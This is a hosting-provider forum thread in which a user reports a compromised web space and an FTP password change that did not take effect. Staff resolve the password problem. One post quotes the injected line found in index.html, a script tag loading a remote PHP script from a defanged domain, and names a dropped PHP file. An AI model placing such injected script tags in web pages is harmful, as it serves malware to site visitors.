cancel
Showing results for 
Search instead for 
Did you mean: 

FTP password

Champnet
Aspiring Hero
Posts: 2,587
Thanks: 971
Fixes: 11
Registered: ‎25-07-2007

FTP password

I've been informed by PlusNet Support that files in my web space have been compromised and or possibly infected.
I've cleaned the infected file then tried to change the FTP password.
I've changed my members password which should change the FTP password - but it hasn't.
FTP access is via ftp.force9.net.  Any help appreciated..........
Thanks - David
8 REPLIES 8
spraxyt
Resting Legend
Posts: 10,063
Thanks: 674
Fixes: 75
Registered: ‎06-04-2007

Re: FTP password

As you said changing the Member Centre password should change that for FTP to homepages. Does your FTP client log tell you which server number you logged into using the old password? Just wondering if it's always the same one?
David too
David
Champnet
Aspiring Hero
Posts: 2,587
Thanks: 971
Fixes: 11
Registered: ‎25-07-2007

Re: FTP password


This is the FTP log, is server no #1 ?
17:39:09 Status: Resolving address of ftp.force9.net
17:39:09 Status: Connecting to 212.159.9.90:21...
17:39:09 Status: Connection established, waiting for welcome message...
17:39:09 Response: 220-PLEASE NOTE: If you have a non-subscription account you
17:39:09 Response: 220-will only be able to login to this ftp server if you are
17:39:09 Response: 220-dialled into our network.
17:39:09 Response: 220-
17:39:09 Response: 220-A Maximum of 4 concurrent connections are allowed to this
17:39:09 Response: 220-server, each session is limited to 256KB/s downloads.
17:39:09 Response: 220-
17:39:09 Response: 220 Force9 FTP Server #1 ready
17:39:09 Command: USER xxxxx
17:39:09 Response: 331 Password required for xxxxx
17:39:09 Command: PASS ********
17:39:09 Response: 230 User xxxxx logged in
17:39:09 Command: SYST
17:39:09 Response: 215 UNIX Type: L8
17:39:09 Command: FEAT
17:39:09 Response: 211-Features:
17:39:09 Response: MDTM
17:39:09 Response: MFMT
17:39:09 Response: TVFS
17:39:09 Response: UTF8
17:39:09 Response: MFF modify;UNIX.group;UNIX.mode;
17:39:09 Response: MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*;
17:39:09 Response: LANG en-GB*
17:39:09 Response: REST STREAM
17:39:09 Response: SIZE
17:39:09 Response: 211 End
17:39:09 Command: OPTS UTF8 ON
17:39:09 Response: 200 UTF8 set to on
17:39:09 Status: Connected
17:39:09 Status: Retrieving directory listing...
17:39:09 Command: CWD /htdocs
17:39:09 Response: 250 CWD command successful
17:39:09 Command: PWD
17:39:09 Response: 257 "/htdocs" is the current directory
17:39:09 Command: TYPE I
17:39:09 Response: 200 Type set to I
17:39:09 Command: PASV
17:39:09 Response: 227 Entering Passive Mode (212,159,9,90,147,210)
17:39:09 Command: MLSD
17:39:09 Response: 150 Opening ASCII mode data connection for MLSD
17:39:09 Response: 226 Transfer complete
spraxyt
Resting Legend
Posts: 10,063
Thanks: 674
Fixes: 75
Registered: ‎06-04-2007

Re: FTP password

Quote from: Champnet

This is the FTP log, is server no #1 ?
17:39:09 Response: 220 Force9 FTP Server #1 ready

Yes, that line gives the server number (#1). If you log in again you might get a different server number. If so that might require the new password.
(I've just FTPed into #1.)
David
Champnet
Aspiring Hero
Posts: 2,587
Thanks: 971
Fixes: 11
Registered: ‎25-07-2007

Re: FTP password

Keep trying and still getting #1
RDP to work PC which has never connected before and it's connecting to #1
Concern is someone, or something, has cracked the 8 char non dictionary password and it still works......
Thanks - David
spraxyt
Resting Legend
Posts: 10,063
Thanks: 674
Fixes: 75
Registered: ‎06-04-2007

Re: FTP password

I've just got #1 again. Have you any idea which IP the intruder came from?
David
Champnet
Aspiring Hero
Posts: 2,587
Thanks: 971
Fixes: 11
Registered: ‎25-07-2007

Re: FTP password

Details from PlusNet logs for last 7 days. :
                                                                                      HostCountry     Hits Visitors Bandwidth (KB)
1 spider-178-154-243-93.yandex.com                           United States                    6    6       4
2 95-25-23-13.broadband.corbina.ru                             Russian Federation           2         2       2
3 ip-176-193-23-29.bb.netbynet.ru                                Russian Federation           1         1       1
4 ip-176-195-71-203.bb.netbynet.ru                              Russian Federation           1        1       1
5 ip-95-220-94-69.bb.netbynet.ru                                  Russian Federation           1   1           1
6 92.242.35.54                                                               Russian Federation           1        1        0
7 192.241.245.86                                                          Unknown                            1        1       1
8 dynamicip-94-180-152-100.pppoe.kzn.ertelecom.ru Russian Federation             2   1       2
Site is dormant, used only for HTML5 testing.
Line added to end of index.html :
<!--f66b7e--><script type="text/javascript" src="http://starbeat.dd/th7prk94.php?id=1175064"></script><!--/f66b7e-->
I've changed .de to dd to prevent accidental link
File added to directory :
l_backuptoster_check.php

bobpullen
Community Gaffer
Community Gaffer
Posts: 16,869
Thanks: 4,950
Fixes: 315
Registered: ‎04-04-2007

Re: FTP password

I've tried forcing the password change through. Let me know if it's still recognising the old one in an hour's time.

Bob Pullen
Plusnet Product Team
If I've been helpful then please give thanks ⤵

Champnet
Aspiring Hero
Posts: 2,587
Thanks: 971
Fixes: 11
Registered: ‎25-07-2007

Re: FTP password

New password now accepted. old old denied.
Many thanks
David